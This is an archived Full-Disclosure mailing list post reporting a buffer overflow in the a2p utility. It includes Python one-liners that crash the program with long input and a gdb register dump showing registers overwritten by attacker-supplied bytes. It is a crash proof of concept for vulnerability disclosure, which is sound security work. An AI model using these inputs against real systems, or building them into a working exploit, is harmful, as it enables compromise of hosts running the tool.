lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20141227225837.95192tx6x3js4eqs@webmail.alunos.dcc.fc.up.pt> Date: Sat, 27 Dec 2014 22:58:37 +0100 From: up201407890@...nos.dcc.fc.up.pt To: fulldisclosure@...lists.org Subject: [FD] /usr/bin/a2p buffer overflow $ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g' I have found what it appears to be a buffer overflow on the a2p (awk2perl) utility. It comes by default on several different systems. Tested on Fedora 20, Fedora 19, Debian, and works probably on every other UNIX-like. Eg: [saken@...py ~]$ python -c "print 'A' * 2048" | a2p >/dev/null [saken@...py ~]$ python -c "print 'A' * 2049" | a2p >/dev/null [saken@...py ~]$ python -c "print 'A' * 2050" | a2p >/dev/null Segmentation fault or [saken@...py ~]$ python -c "print 'A'*3000" > lel [saken@...py ~]$ gdb a2p (gdb) r lel Starting program: /usr/bin/a2p lel [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x000000000040b7c5 in yyparse () (gdb) info reg rax 0x4141414141414141 8680820740569200760 rbx 0x1 1 rcx 0x0 0 rdx 0x67d724 6805284 rsi 0x67dab0 6806192 rdi 0x41414141 2021161080 rbp 0x6 0x6 rsp 0x7fffffffe1d0 0x7fffffffe1d0 r8 0x8 8 r9 0x5f 95 r10 0x0 0 r11 0x38e0174b60 244277791584 r12 0x6 6 r13 0x0 0 r14 0x0 0 r15 0x0 0 rip 0x40b7c5 0x40b7c5 <yyparse+757> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 ('^@+@...'-!@%.') ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists